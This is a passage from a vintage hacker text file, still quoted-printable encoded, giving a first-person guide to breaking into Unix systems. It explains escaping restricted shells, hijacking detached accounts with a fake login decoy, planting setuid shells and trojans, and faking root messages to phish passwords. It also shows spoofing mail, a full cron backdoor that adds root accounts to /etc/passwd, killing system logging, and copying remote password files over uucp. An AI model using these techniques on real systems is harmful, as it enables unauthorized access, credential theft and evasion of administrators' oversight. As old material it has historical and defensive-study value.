=09The rsh (restricted Bourne shell) shell attempts to limit the comm=
ands=20
available to a user by preventing him from executing commands outside=
of his=20
searchpath, and preventing him from changing directories. It also pre=
vents you=20
=66rom changing the value of shell variables directly (i.e. typing=
=20
"variable=3Dvalue"). There are some easy ways to overcome these restr=
ictions.
=09You can reference any file and directory in the system by simply u=
sing=20
its full pathname. You can't change directories like this, or execute=
a file
that is outside of your searchpath, but you can do such things as lis=
t out the=20
contents of directories, edit files in other directories, etc. (If yo=
u have=20
access to the necessary commands.)
=09The biggest flaw in rsh security is that the restrictions that are=
=20
described above ignored when the account's profile file is executed u=
pon logon.=20
This means that, if you have access to the edit command, or some othe=
r means of=20
modifying your account's profile, you can add a line to add a directo=
ry to your=20
searchpath, thereby letting you execute any programs in that director=
y. The=20
restriction on changing directories is also ignored during logon exec=
ution of=20
the profile. So, if you absolutely, positively HAVE to go to another =
directory,=20
you can add a cd command your .profile file.
OVERCOMING COPY AND WRITE RESTRICTIONS
--------------------------------------
=09This is a simple trick. If you have read access t a file, but cann=
ot=20
copy it because of directory protections, simply redirect the output =
of the cat=20
command into another file. If you have write access to a directory bu=
t not=20
write access to a specific file, you can create a copy of the file, m=
odify it=20
(since it will be owned by your account), delete the original, and re=
name the=20
copy to the name of the original.
DETACHED ACCOUNTS
-----------------
=09This is a big security hole in many Unix systems. Occasionally, if=
a=20
user is disconnected without logging off, his account may remain on-l=
ine, and=20
still attached to the tty he was connected to the system through. Now=
, if=20
someone calls to the system and and gets connected to that tty, he is=
=20
automatically inside the system, inside the disconnected user's accou=
nt. There=20
are some interesting ways to take advantage of this flaw. For instanc=
e, if you=20
desire to gain the passwords to more account, you can set a decoy pro=
gram up to=20
fake the login sequence, execute the program, and then disconnect fro=
m the=20
system. Soon, some unlucky user will call the system and be switched =
into the=20
detached account's tty. When they enter their username and password, =
the decoy=20
will store their input in a file on the system, display the message "=
login=20
incorrect", and then kill the detached account's shell process, thus =
placing=20
the user at the real login prompt. A Unix decoy written by Shooting S=
hark will=20
be given at the end of this file.
UID SHELLS
----------
=09When the uid bit is set on a shell program, executing this shell w=
ill=20
change your user id to the user id of the account that owns the shell=
file, and=20
you will have full use of that account, until you press control-d (en=
ding the=20
second shell process) and return to your normal user id. This gives y=
ou the=20
power to execute any commands under that account's user id. This is b=
etter than=20
knowing the account's password, since as long as the file remains on =
the=20
system, you can continue to make use of that account, even if the pas=
sword is=20
changed. When I gain control of an account, I usually make a copy of =
the shell=20
while logged in under that account in a nice, out of the way director=
y, and set=20
its uid and gid bits. That way, if I should happen to lose the accoun=
t (for=20
instance, if the password were changed), I could log in under another=
account=20
and still make use of the lost account by executing the uid shell.
FORCED DETACHING
----------------
=09This is an easy means of gaining the use of an account on systems =
with=20
the detached account flaw. Usually, most terminal device files will h=
ave public=20
write permission, so that the user that logs in under it can receive =
messages=20
via write (unless he turns off messages with the mesg n command). Thi=
s means=20
that you can cat a file into the user's terminal device file. A compi=
led file,=20
full of all kinds of strange control characters and garbage, works ni=
cely. Say,=20
the user is logged in on tty03. Just type cat /bin/sh > /dev/tty03. T=
he user=20
will see something like this on his screen:
LKYD;uiayh;fjahfasnf kajbg;aev;iuaeb/vkjeb/kgjebg;iwurghjiugj;di vd=
=20
b/fujhf;shf;j;kajbv;jfa;vdblwituwoet8y6-
2958ybp959vqvq43p8ytpgyeerv98tyq438pt634956b v856 -868vcf-56-
e8w9v6bc[6[b6r8wpcvt
Hehehe! Now, the poor devil is confused. He tries to press break- no =
response,=20
and the garbage just keeps coming. He tries to enter various commands=
, to no=20
avail. Catting a file into his terminal device file "ties it up", so =
to speak,=20
and since this is the file through which all I/O with his terminal is=
done, he=20
finds it almost impossible to get any input through to the shell. He =
can't even=20
log off! So, in desperation, he disconnects... It is best to execute =
the cat=20
command as a background process, so that you can keep an eye on the u=
sers on=20
the system. Usually, the user will call the system back and, unless h=
e gets=20
switched back into his old detached account (in which case he will us=
ually hang=20
up again), he will kill the detached account's login process. So, if =
you see 2=20
users on the system using the same username, you know he's logged bac=
k in=20
already. Anyways...after an appropriate length of time, and you feel =
that he's=20
disconnected, log off and call the system back a few times until you =
get=20
switched into the detached account. Then just create a uid shell owne=
d by the=20
account and you can use it any time you please, even though you don't=
know the=20
password. Just remember one thing, though-when the cat command has fi=
nished=20
displaying the compiled file on the victim's screen, if he is still l=
ogged on=20
to that terminal, he will regain control. Use a long file!
FAKING WRITE MESSAGES
---------------------
=09Being able to write to other people's terminal files also makes it=
=20
possible to fake write messages from any user on the system. For exam=
ple, you=20
wish to fake a message from root. Edit a file to contain these lines:
Message from root console ^g [note control-g (bell) character]
Bill, change your password to "commie" before logging off today. Ther=
e has been=20
a security leak.
<EOF> [don't forget to put this-<EOF>-in the file.]
Now, type "who" to find bill's tty device, and type:
cat [filename] > /dev/ttyxx
Bill will see:
Message from root console [beep!]
Bill, change your password to "commie" before logging off today. Ther=
e has been=20
a security leak.
<EOF>
WHEN FILE PERMISSIONS ARE CHECKED
---------------------------------
=09Unix checks file permissions every time you issue a write or execu=
te=20
command to a file. It only checks read permissions, however, when you=
first=20
issue the read command. For instance, if you issued the command to ca=
t the=20
contents of a file, and someone changed the file's permissions so tha=
t you did=20
not have read permission while the process was still being executed, =
the cat=20
command would continue as normal.
ONLINE TERMINAL READING
-----------------------
=09You can also, if you have some means of assuming an account's user=
id,=20
(such as having a uid shell for that account), you can read the conte=
nts of=20
someone's terminal on-line. Just execute the uid shell and type "cat=
=20
/dev/ttyxx &" (which will execute the cat command in the background, =
which will=20
still display the contents to your screen, but will also allow you to=
enter=20
commands). Once the person logs off, ownership of his terminal device=
file will=20
revert to root (terminal device files are temporarily owned by the ac=
count=20
logged in under them), but since you had the proper permissions when =
you=20
started the read process, you can still continue to view the contents=
of that=20
terminal file, and can watch, online, as the next use logs in. There =
is also=20
one other trick that can sometimes be used to gain the root password,=
but=20
should be exercised as a last resort, since it involved revealing you=
r identity=20
as a hacker to the superuser. On many systems, the superuser also has=
a normal=20
user account that he uses for personal business, and only uses the ro=
ot account=20
for system management purposes. (This is, actually, a rather smart se=
curity=20
move, as it lessens the chances of, say, things like his executing a =
trojan=20
horse program while under the root account, which, to say the least, =
could be=20
disastrous [from his point of view].) If you can obtain a uid shell f=
or his=20
user account, simply execute a read process of his terminal file in t=
he=20
background (while under the uid shell), and then drop back into your =
normal=20
shell. Then send him a write message like:
I'm going to format your winchesters
When he uses the su command to go to the superuser account to kick yo=
u off the=20
system, you can sit back and watch him type in the root password. (Th=
is should=20
only be done if you have more than one account on the system- remembe=
r, many=20
systems will not let you log into a superuser account remotely, and i=
f the only=20
account you have is a superuser account, you are effectively locked o=
ut of the=20
system.)
MAIL FRAUD
----------
=09The TCP/IP protocol is a common protocol for file transfers betwee=
n=20
Unix systems, and between Unix and other operating systems. If the Un=
ix system=20
you are on features TCP/IP file transfers, it will have the telnet pr=
ogram on-
line, usually in the directory /bin. This can be used to fake mail f=
rom any=20
user on the system. Type "telnet" to execute the telnet program. You =
should=20
see:
Telnet>
At this prompt, type "open [name] 25", where name is the uucp network=
name of=20
the system you are on. This will connect you to the system's 25th por=
t, used to=20
receive network mail. Once connected, type:
rcpt to: [username]
Where username is the name of the user you wish to send mail to. Next=
, type:
mail from: [user]
Where user is the name of the use you wish the mail to appear from. Y=
ou can=20
also specify a non-existant user. You can also fake network mail from=
a user on=20
another system. For information on the format of the address, see the=
section=20
on the uucp facilities. Then type:
data
You will be prompted to enter the message. Enter "." on a blank line =
to end and=20
send the mail. When you'e finished sending mail, type "quit" to exit.
=09Thanks to Kid&CO. from Private Sector/2600 Magazine for that novel=
bit=20
of information.
UNIX TROJAN HORSES
------------------
=09This is an old, OLD subject, and there's little original material =
to=20
add about it. Trojan horses are programs that appear to execute one f=
unction,=20
but actually perform another. This is perhaps the most common means o=
f hacking=20
Unix.
=09One of the easiest means of setting up a Unix trojan horse is to p=
lace=20
a program named after a system command, such as ls, "in the way" of s=
omeone's=20
search path. For instance, if a user's searchpath is ".:/usr/bin", wh=
ich means=20
that the system searches the user's current directory for a command f=
irst, you=20
could place a shell script in the user's home directory called "ls" t=
hat, when=20
executed, created a copy of the shell, set the new shell file's uid a=
nd gid=20
bits, echo an error message (such as "lsa: not found", leading the us=
er to=20
think he mistyped the command and the offending character was not ech=
oed, due=20
to line noise or whatever), and delete itself. When the user executes=
the ls=20
command in his directory, the uid shell is created. Another good idea=
is to set=20
the name of the trojan to a command in the user's login file, have it=
make the=20
uid shell, execute the real command, and then delete itself.
=09Another good way to set up a trojan horse is to include a few line=
s in=20
a user's login file. Simply look at the user's password file entry to=
find out=20
which shell he logs in under, and then modify the appropriate login f=
ile (or=20
create one if it doesn't exist) to create a uid shell when the user l=
ogs on.
=09If you can modify a user's file in the directory=20
/usr/spool/cron/crontabs, you can add an entry to create a uid shell.=
Just=20
specify * * * * * as the times, and wait about 1-2 minutes. In 1 minu=
te, the=20
cron utility will execute the commands in the user's crontab file. Th=
en you can=20
delete the entry. Again, if the user doesn't have a file in=20
/usr/spool/cron/crontabs, you can create one.
=09One last note- be sure you give the trojan horse execute permissio=
nsm,=20
otherwise the victim will receive the message "[filename]- cannot exe=
cute"...=20
Kind of a dead giveaway.
CHANGING UID PROGRAMS
---------------------
=09If you have write access to a uid file, you can easily modify it t=
o=20
become a shell. First, copy the file. Then type:
cat /bin/sh > [uid file]
This will replace the file's contents with a shell program, but the u=
id bit=20
will remain set. Then execute the file and create a well-hidden uid s=
hell, and=20
replace the subverted uid file with the copy.
ADDING AN ACCOUNT TO A UNIX SYSTEM
----------------------------------
=09To add an account to a Unix system, you must have write access to =
the=20
password file, or access to the root account so that you can change t=
he=20
password file's protections. To add an account, simply edit the file =
with the=20
text file editor, edit (or any of the other Unix editors, if you wish=
). Add an
entry like this:
[username]::[user#]:[group#]:[description]:[home directory]:[pathname=
of shell]
Notice that the password field is left blank. To set the password, ty=
pe:
passwd [username]
You will then be prompted to enter and verify a password for the acco=
unt.
If you wish the account to have superuser privileges, it must have a =
user=20
number of zero.
UNIX BACKDOOR
-------------
=09A backdoor is a means of by-passing a system's normal security for=
=20
keeping unauthorized users out. For all the talk about back doors, th=
ey are=20
rarely accomplished. But creating a backdoor in Unix System V is real=
ly quite=20
easy. It simply requires adding a few entries to the file=20
/usr/lib/crontab or /usr/spool/cron/crontabs/root. (Again, if the fil=
e doesn't=20
exist, you can create it.) Add these lines, which will create 2 accou=
nts on the
system, one a user account ("prop") and one a superuser account ("pro=
p2"), at
1 am system time every night, and delete them at 2 am every night.
0 1 * * * chmod +w /etc/passwd
1 1 * * * echo "prop::1:1::/:/bin/sh" >> /etc/passwd
2 1 * * * echo "prop2::0:0::/:/bin/sh" >> /etc/passwd
20 1 * * * grep -v "prop*:" /etc/passwd > /usr/spool/uucppublic/.p
0 2 * * * cat /usr/spool/uucppublic/.p > /etc/passwd
10 2 * * * chmod -w /etc/passwd
15 2 * * * rm /usr/spool/uucppublic/.p
COVERING YOUR TRACKS
--------------------
=09Naturally, you want to keep your cover, and not leave any trace th=
at=20
there is a hacker on the system. This section will give you some tips=
on how to=20
do just that. First of all, the Unix system keeps track of when a fil=
e was last=20
modified (see the information on the command ls -l in the section on =
file and=20
directory protections). You don't want anyone noticing that a file ha=
s been=20
tampered with recently, so after screwing around with a file, if at a=
ll=20
possible, you should return its last modified date to its previous va=
lue using=20
the touch command. The syntax for the touch command is:
touch hhmmMMdd [file]
Where hh is the hour, mm is the minute, MM is the month, and dd is th=
e day.=20
[file] is the name of the file you wish to change the date on.
=09What usually gives hackers away are files they create on a system.=
If=20
you must create files and directories, make use of the hidden files f=
eature.=20
Also, try to hide them in directories that are rarely "ls"'d, such as=
=20
/usr/spool/lp, /usr/lib/uucp, etc (in other words, directories whose =
contents=20
are rarely tampered with).
=09Avoid use of the mail facilities, as anyone with the proper access=
can=20
read the /usr/mail files. If you must send mail to another hacker on =
the=20
system, write the message into a text file first, and encrypt it. The=
n mail it=20
to the recipient, who can save the message without the mail header us=
ing the w=20
option, and decrypt it.
=09Rather than adding additional superuser accounts to a system, I've=
=20
found it better to add simple user accounts (which don't stand out qu=
ite as=20
much) and use a root uid shell (judiciously hidden in a rarely used d=
irectory)=20
whenever I need superuser privileges. It's best to use a user account=
as much=20
as possible, and only go to the superuser account whenever you absolu=
tely need=20
superuser priv's. This may prevent damaging accidents. And be careful=
when=20
creating a home directory for any accounts you add. I've always found=
it better=20
to use existing directories, or to add a hidden subdirectory to a lit=
tle-
tampered with directory.
=09Many systems have "watchdog" programs which log off inactive accou=
nts=20
after a certain period of time. These programs usually keep logs of t=
his kind=20
of activityl. Avoid sitting on the sitting doing nothing for long per=
iods of=20
time.
=09While using some of the methods described in this file, you may re=
place=20
a user's file with a modified copy. This copy will be owned by your a=
ccount and=20
group instead of the account which owned the original. You can change=
the group=20
back to the original owner's group with the chgrp command, the format=
of which=20
is:
chgrp [groupname] [file]
And change the owner back to the original with the chown command:
chown [user] [file]
=09When you change ownership or group ownership of a file, the uid an=
d gid=20
bits respectively are reset, so you can't copy the shell, set its uid=
bit, and=20
change its owner to root to gain superuser capabilities.
=09Above all, just be careful and watch your step! Unix is a very fle=
xible=20
operating system, and even though it comes equipped with very little =
in the way=20
of accounting, it is easy to add your own security features to it. If=
you do=20
something wrong, such as attempting to log in under a superuser accou=
nt=20
remotely only to see "not on console-goodbye", assume that a note is =
made of=20
the incident somewhere on the system. Never assume that something [an=
ything!]=20
won't be noticed. And leave the system and its files exactly as you f=
ound them.=20
In short, just use a little common sense.
=09If you're a real klutze, you can turn off the error logging (if yo=
u=20
have root capabilities). I will include information on System V error=
logging,=20
which most Unix clones will have error logging facilities similar to,=
and on=20
Berkely Standard Distribution (BSD) Unix error logging.
BERKELY (BSD) UNIX ERROR LOGGING
--------------------------------
Type "cat /etc/syslog.pid". This file contains the=20
process number of the syslog (error logging) program. Kill this proce=
ss, and=20
you stop the error logging. Remember to start the logging process bac=
k up after=20
you're through stumbling around.=20
=09If you want to see where the error messages are sent, type:
cat /etc/syslog.config
Entries are in the form:
#file
Such as:
5/etc/errlogfile
The number is the priority of the error, and the file is the file tha=
t errors=20
of that priority or higher are logged to. If you see an entry with /d=
ev/console=20
as its log file, watch out! Errors of that priority will result in an=
error=20
message being displayed on the system console. Sometimes, a list of u=
sernames=20
will follow an entry for errorlogging. This means that these users wi=
ll be=20
notified of any priorities of that level or higher.
There are 9 levels of priority to errors, and an estimation of their=
=20
importance:
9 -Lowly errors. This information is just unimportant junk used=
to debug
=09small errors in the system operation that usually won't affect its
=09performance. Usually discarded without a glance.
8 -Usually just thrown away. These messages provide information=
on the
=09system's operation, but nothing particularly useful.
7 -Not greatly important, but stored for informational purposes=
.
6 -System errors which can be recovered from.
5 -This is the priority generally given to errors caused by hac=
kers-
=09not errors, but important information, such as security violatins:
=09bad login and su attempts, attempts to access files without proper
=09permissions, etc.
4 -Errors of higher priority than 6.
3 -Major hardware and software errors.
2 -An error that requires immediate attention...very serious.
1 -***<<<(((CRAAASSSHHH!!!)))>>>***-
SYSTEM V ERROR LOGGING
----------------------
=09System V error logging is relatively simple compared to Berkely Un=
ix=20
error logging. The System V error logging program is errdemon. To fin=
d the=20
process id of the error logging program, type "ps -uroot". This will =
give you a=20
list of all the processes run under the root id. You will find /etc/e=
rrdemon=20
somewhere in the list. Kill the process, and no more error logging. T=
he=20
errdemon program is not as sophisticated as BSD Unix's syslog program=
: it only=20
logs all errors into a file (the default file is /usr/adm/errfile, bu=
t another=20
file can be specified as an argument to the program when it is starte=
d).=20
Errdemon does not analyze the errors as syslog does, it simply takes =
them from=20
a special device file called /dev/error and dumps them into the error=
logging=20
file. If you wish to examine the error report, use the errpt program,=
which=20
creates a report of the errors in the error logging file and prints i=
t out on=20
the stanard output. The format is: errpt [option] [error logging file=
]. For a=20
complete report of all errors, use the -a option:
errpt -a /usr/adm/errfile
The output is very technical, however, and not of much use to the hac=
ker.
UUCP NETWORKING
---------------
=09This section will cover the workings and use of the Unix uucp=20
facilities. UUCP stands for Unix to Unix Copy. The uucp utilities are=
for the=20
exchange of files between Unix systems. There also facilities for use=
rs to dial=20
out and interact with remote systems, and for executing limited comma=
nds on=20
remote systems without logging in.
OUTWARD DIALING
---------------
=09The command for outward dialing is cu. The format is:
cu -n[phone number]
Such as:
cu -n13125285020
On earlier versions of Unix, the format was simply "cu [phone number]=
".
Note, that the format of the phone number may be different from syste=
m to=20
system- for instance, a system that dials outward off of a pbx may ne=
ed to have=20
the number prefixed by a 9, and one that uses an extender may not nee=
d to have=20
the number (if long distance) preceded by a 1. To dial out, however, =
the system=20
must have facilities for dialing out. The file /usr/lib/uucp/Devices =
(called=20
L-devices on earlier systems) will contain a list of the available di=
alout=20
devices. Entries in this file are in the format:
[device type] [device name] [dial device] [linespeed] [protocol, =
optional]
Device type is one of 2 types: ACU and DIR. If ACU, it is a dialout d=
evice. DIR=20
is a direct connection to a specific system. Device name is the name=
of the=20
base name of the dialout device's device file, which is located in th=
e /dev=20
directory. Dial device is usually an unused field. It was used on old=
er systems=20
where one device (device name in the above example) was used to excha=
nge data,=20
and another device (dial device, above) did the telephone dialing. In=
the age=20
of the autodial modem, this is a rarely used feature. The next, lines=
peed, is=20
the baud rate of the device, usually either 300, 1200, or 2400, possi=
bly 4800=20
or 9600 if the device is a direct connection. The protocol field is f=
or=20
specifying the communications protocol. This field is optional and ge=
nerally=20
not used. Here is an example entry for a dialout device and a direct=
=20
connection:
ACU tty99 unused 1200
DIR tty03 unused 9600
If a dialout device is capable of more than one baud rate, it must ha=
ve 2=20
entries in the Devices (L-devices) file, one for each baud rate. Note=
, that the=20
device in the above example is a tty- usually, dialout device names w=
ill be in=20
the form tty##, as they can be used both for dialing out, and receivi=
ng=20
incoming calls. The device can be named anything, however.
There are several options worth mentioning to cu:
-s Allows you to specify the baud rate. There must be a device i=
n the
=09Devices file with this speed.
-l Allows you to specify which device you wish to use.
If you wish to connect to a system that there is a direct connection =
with,=20
simply type "cu -l[device]". This will connect you to it. You can als=
o do that=20
do directly connect to a dialout device, from which point, if you kno=
w what=20
commands it accepts, you can give it the dial commands directly.
Using the cu command is basically the same as using a terminal progra=
m. When=20
you use it to connect to a system, you then interact with that system=
as if you=20
dialed it directly from a terminal. Like any good terminal program, t=
he cu=20
"terminal program" provides facilities for file transfers, and other =
commands.=20
Here is a summary of the commands:
~. -Disconnect from the remote system.
~! -Temporarily execute a shell on the local system. =
When you=20
=09=09 wish to return to the remote system, press control-D.
~![cmd] -Execute a command on the local system. Example: ~=
!ls -a
~$[cmd] -Execute a command on the local system and send th=
e output to
=09=09 the remote system.
~%put f1 f2 -Sends a file to the remote system. F1 is the name=
of the
=09=09 file on the local system, and f2 is the name to be given the
=09=09 copy made on the remote system.
~take f1 f2 -Copies a file from the remote to the local system=
. F1 is
=09=09 the name of the remote file, and f2 is the name to be given
=09=09 to the local copy.
Note, that the commands for transferring output and files will only w=
ork if you=20
are communicating with another Unix system.
=09You may be wondering how you can find out the format for the phone=
=20
number, which is necessary to dial out. The format can be obtained fr=
om the=20
file /usr/lib/uucp/Systems (called L.sys on earlier Unix systems). Th=
is file=20
contains the uucp network names and phone numbers of other Unix syste=
ms, as=20
well as other information about them. This file contains the informat=
ion needed=20
to carry out uucp file transfers with the systems listed within it. T=
he entries=20
are in the format:
[system name] [times] [devicename] [linespeed] [phone number] [l=
ogin info]
System name is the name of the system.
Times is a list of the times when the system can be contacted. This f=
ield will=20
usually just have the entry "Any", which means that the system can be=
contacted=20
at any time. Never means that the system can never be called. You can=
also=20
specify specific days and times when the system can be contacted. The=
days are=20
abbreviated like this:
Su Mo Tu We Th Fr Sa
Where Su is Sunday, Mo is Monday, etc. If the system can be called on=
more than=20
one day of the week, you can string the days together like this:SuMoT=
u for=20
Sunday, Monday, and Tuesday. You can also specify a range of hours wh=
en the=20
system can be called, in the 24 hour format, like this: Su,0000-0100 =
means that=20
the system can be called Sunday from midnight to 1am. The week days (=
Monday=20
through Friday) can be abbreviated as Wk.
Device name is the name of the device to call the system with. If the=
system is=20
directly connected, this file will contain the base name of the devic=
e file of=20
the device which connects it to the local system. If the system has t=
o be=20
dialed over the phone, this field will be "ACU".
Linespeed is the baud rate needed to connect to the system. There mus=
t be a=20
device available with the specified baud rate to contact the system.
Phone number is the phone number of the system. By looking at these e=
ntries,=20
you can obtain the format for the phone number. For instance, if this=
field=20
contained "913125285020" for an entry, you would know that the format=
would be=20
9+1+area code+prefix+suffix.=20
The login field contains information used for uucp transfers, and wil=
l be=20
discussed in detail later.
=09Sometimes you will see alphabetic or other strange characters in t=
he=20
phone number field. Sometimes, these may be commands for the particul=
ar brand=20
of modem that the system is using to dialout, but other times, these =
may=20
actually be a part of the phone number. If so, the meaning of these c=
haracters=20
called tokens can be found in the file /usr/lib/uucp/Dialcodes (calle=
d
L-dialcodes on earlier systems). Entries in this file are in the form=
:
token translation
For example:
chicago 312
Would mean that the token chicago means to dial 312. So, if the phone=
number=20
field of a Systems entry was:
chicago5285020
It would mean to dial 3125285020.
You can add an entry to the Systems file for systems that you wish to=
call=20
frequently. Simply edit the file using one of the Unix system's edito=
rs, and=20
add an entry like this:
ripco Any ACU 1200 13125285020 unused
And then any time you wished to call the BBS Ripco, you would type:
cu ripco
And the system would do the dialing for you, drawing the phone number=
from the=20
entry for Ripco in the Systems file.
HOW UUCP TRANSFERS WORK
-----------------------
=09This section will detail how a uucp file transfer works. When you =
issue=20
the command to transfer a file to/from a remote system, the local sys=
tem dials=20
out to the remote system. Then, using the information contained in th=
e login=20
field of the Systems file, it logs into an account on the remote syst=
em, in=20
exactly the same manner as you would log into a Unix system. Usually,=
however,=20
uucp accounts use a special shell, called uucico, which implements ce=
rtain=20
security features which (are supposed to) keep the uucp account from =
being used=20
for any other purpose than file transfers with another Unix system. (=
Note: not=20
ALL uucp accounts will use this shell.) If you've ever logged into th=
e uucp=20
account on the system and received the message, "Shere=3D[system name=
]", and the=20
system wouldn't respond to any of your input, that account was using =
the uucico=20
shell, which prevents the account from being used as a normal "user" =
account.=20
The local system then requests the transfer, and if security features=
of the=20
remote system which will be discussed later do not prevent the transf=
er, the=20
file will be copied to (or from if you requested to send a file) the =
local=20
system. The account is then logged off of the remote system, and the =
connection=20
is dropped.
ADDING A LOGIN FIELD TO A SYSTEMS ENTRY
--------------------------------------
=09Many superusers feel that if the uucp account uses the uucico shel=
l,=20
that it is "secure". Because of this, they may ignore other uucp secu=
rity=20
measures, and probably not give the account a password. If you find s=
uch a=20
system, you can add an entry for the system to the Systems (L.sys) fi=
le of=20
another Unix system and try to, say, transfer a copy of its password =
file. To=20
do so, simply follow the outline in the section on cu for how to add =
an entry=20
to the Systems file. That will cover everything but how to add the lo=
gin field,=20
which is covered in this section.=20
=09The login section consists of expect/sendsubfields. For example, h=
ere=20
is an example login field:
ogin: uucp assword: uucp
The first subfield is what is expected from the remote system, in thi=
s case=20
"ogin:". This means to expect the login prompt, "Login:". Note, that =
you do not=20
have to enter the complete text that the remote system sends, the tex=
t sent=20
=66rom the remote system is scanned left to right as it is sent until=
the=20
expected text is found. The second subfield contains the local system=
's=20
response, which is sent to the remote system. In this case, the local=
system=20
sends "uucp" when it receives the login prompt. Next, the local syste=
m scans=20
the output from the remote system until it receives "assword:" ("pass=
word:"),=20
then sends "uucp" (the password, in this example, for the uucp accoun=
t).=20
Because of line noise or other interference, when the local system co=
nnects to=20
the remote, it may not receive the expected string. For this possibil=
ity, you=20
may specify the expected string several times, like this:
ogin:-ogin: uucp assword:-assword: uucp
The - separates that if the expected string is not received, to expec=
t the=20
string specified after the hyphen. Sometimes, you may need to send a =
special=20
character, such as kill or newline, to the system if the expected str=
ing is not=20
received. You can do that like this:
ogin:-BREAK-ogin: uucp assword: uucp
The -BREAK- means that if ogin: isn't received the first time, to sen=
d a break=20
signal to the remote system, and then expect ogin: again. Other commo=
n entries=20
are:
ogin:-@-ogin: Send a kill character if the expected string =
isn't
=09=09=09received the first time.
ogin:-EOT-ogin: Send a control-D if the expected string isn't=
received.
ogin:--ogin: Send a null character if the expected string =
isnt'=20
=09=09=09received.
If the system you wish to transfer files with doesn't send anything w=
hen you=20
first connect to it, (say, you have to press return first), the first=
expect=20
entry should be "" (nothing), and the first send field should be \r (=
a return=20
character). There are certain characters, like return, which are repr=
esented by=20
certain symbols or combinations of characters. Here is a list of thes=
e:
\r -Return.
@ -Kill.
- -Null/newline character.
"" -Nothing.
UNUSUAL LOGIN ENTRIES
---------------------
=09Sometimes, the login entry for a system might contain more than ju=
st=20
fields to expect the login prompt, send the username, expect the pass=
word=20
prompt, and send the password. For instance, if you have to go throug=
h a=20
multiplexer to get to the system, the login field would contain a sub=
field to=20
select the proper system from the multiplexer.
=09Sometimes, on systems, that use the Hayes smartmodem to dial out, =
the=20
phone number field may be left unused (will contain an arbitrary entr=
y, such as=20
the word "UNUSED"), and the dialing command will be contained in the =
login=20
field. For example:
ripco Any ACU 1200 UNUSED "" ATDT13125285020 CONNECT \r ernumber: n=
ew
So, when you try to transfer a file with a Unix system called "ripco"=
:
"UNUSED" is sent to the Hayes smartmodem. Of course, this is not a va=
lid Hayes=20
command, so it is ignored by the modem. Next, the system moves the lo=
gin field.=20
The first expect subfield is "", which means to expect nothing. It th=
en sends=20
the string "ATDT13125285020", which is a Hayes dialing comand, which =
will make=20
the modem dial 13125285020. When the string "CONNECT" is received (wh=
ich is=20
what the smartmodem will respond with when it connects), the system s=
ends a=20
carriage return and waits for the "Usernumber:" prompt. When it recei=
ves that,=20
it sends "new". This completes the login.
UUCP SYNTAX
-----------
=09Once you've completed an entry for the Unix system you wish to tra=
nsfer=20
files with, you can issue the uucp command, and attempt the transfer.=
The=20
syntax to copy a file from the remote system is:
uucp remote![file pathname] [local pathname]
Where remote is the name of the system you wish to copy the file from=
, [file=20
pathname] is the pathname of the file you wish to copy, and [local pa=
thname] is=20
the pathname of the file on the local system that you wish to name th=
e copy=20
that is made on the local system.
To transfer a file from the local system to the remote system, the sy=
ntax is:
uucp [local pathname] remote![file pathname]
Where [local pathname] is the file on the local system that you wish =
to=20
transfer to the remote system, remote is the name of the remote syste=
m, and=20
[file pathname] is the pathname you wish to give to the copy to be ma=
de on the=20
remote system.=20
So, to copy the ripco system's password file, type:
uucp ripco!/etc/passwd /usr/spool/uucppublic/ripcofile
Which will, hopefully, copy the password file from ripco into a file =
on the=20
local system called /usr/spool/uucppublic/ripcofile. The directory=
=20
/usr/spool/uucppublic is a directory set up especially for the recept=
ion of=20
uucp-transferred files, although you can have the file copied to any =
directory=20
(if the directory permissions don't prevent it).
DEBUGGING UUCP PROCEDURES
-------------------------
=09So, what if your transfer did not go through? Well, this section w=
ill=20
detail how to find out what went wrong, and how to correct the situat=
ion.
UULOG
-----
=09The uulog command is used to draw up a log of transactions with re=
mote=20
systems. You can either draw up the entries by system name, or the na=
me of the=20
user who initiated the transaction.
For our purposes, we only want to draw up the log by system name. The=
format=20
is:
uulog -s[system name]
Now, this will pull up the logs for ALL transactions with this partic=
ular=20
system. We only want the logs for the last attempted transaction with=
the=20
system. Unfortunately, this can't be done, you'll just have to sort t=
hrough the=20
logs until you reach the sequence of the last transaction. If the log=
s extend=20
back a long time, say about a week, however, you can use the grep com=
mand to=20
call up the logs only for a certain date:
uulog -s[system] | grep mm/dd-
Where mm is the month (in the form ##, such as 12 or 01) and dd is th=
e day, in=20
the same form). This takes the output of the uulog command, and searc=
hes=20
through it with the grep command and only prints out those entries wh=
ich=20
contain the date the grep command is searching for. The log entries w=
ill be in=20
the form:
[username] [system] (month/day-hour:minute-pid) DESCRIPTION
Where:
username -Is the userid of the account that initiated the tran=
saction.
system -Is the name of the system that the transaction was a=
ttempted
=09=09with.
month/day -Date of transaction.
hour:minute -Time of transaction.
job number -The transfer's process id.
DESCRIPTION -The log message.
An example of a typical log entry:
root ripco (11/20-2:00-1234) SUCCEEDED (call to ripco)
In the above example, the root account initiated a transaction with t=
he Ripco=20
system. The system was contacted on November 20, at 2:00. The job num=
ber of the=20
transaction is 1234.
Here is an explanation of the various log messages you will encounter=
, and=20
their causes:
1. SUCCEEDED (call to [system name])
The system was successfully contacted.
2. DIAL FAILED (call to [system name])
Uucp failed to contact the system. The phone number entry for the sys=
tem in the=20
Systems file may be wrong, or in the wrong format.
3. OK (startup)
Conversation with the remote system has been initiated.
4. LOGIN FAILED
Uucp was unable to log into the remote system. There may be an error =
in the=20
login field in the entry for the remote system in the Systems file, o=
r line=20
noise may have caused the login to fail.
5. WRONG SYSTEM NAME
The system's entry in the Systems file has the wrong name for the sys=
tem at the=20
phone number specified in the entry.
6. REMOTE DOES NOT KNOW ME
The remote system does not recognize the name of the local system, an=
d will not=20
perform transactions with an unknown system (some will, some won't...=
see the=20
section on uucp security).
7. REQUEST ([remote file] --> [local file] username)
The file transfer has been requested.
8. OK (conversation complete)
The transfer has been completed.
9. ACCESS DENIED
Security measures prevented the file transfers.
If you get this error, you will receive mail on the local system info=
rming you=20
that the transfer was denied by the remote.
10. DEVICE LOCKED
All the dialout devices were currently in use.
A successful transaction log will usually look like this:
root ripco (11/20-2:00-1234) SUCCEEDED (call to ripco)
root ripco (11/20-2:01-1234) OK (startup)
root ripco (11/20-2:01-1234) REQUEST (ripco!/etc/passwd --> /ripcofil=
e root)
root ripco (11/20-2:03 1234) OK (conversation complete)
=09When an error occurs during a transfer with a system, a status fil=
e is=20
created for that system, and remains for a set period of time, usuall=
y about an=20
hour. During this time, that system cannot be contacted. These files,=
depending=20
on which version of Unix you are on, will either be in the directory=
=20
/usr/spool/uucp, and have the form:
STST..[system name]
or will be in the directory /usr/spool/uucp/.Status, and have the sam=
e name as=20
the system. These status files will contain the reason that the last =
transfer=20
attempt with the system failed. These files are periodically purged, =
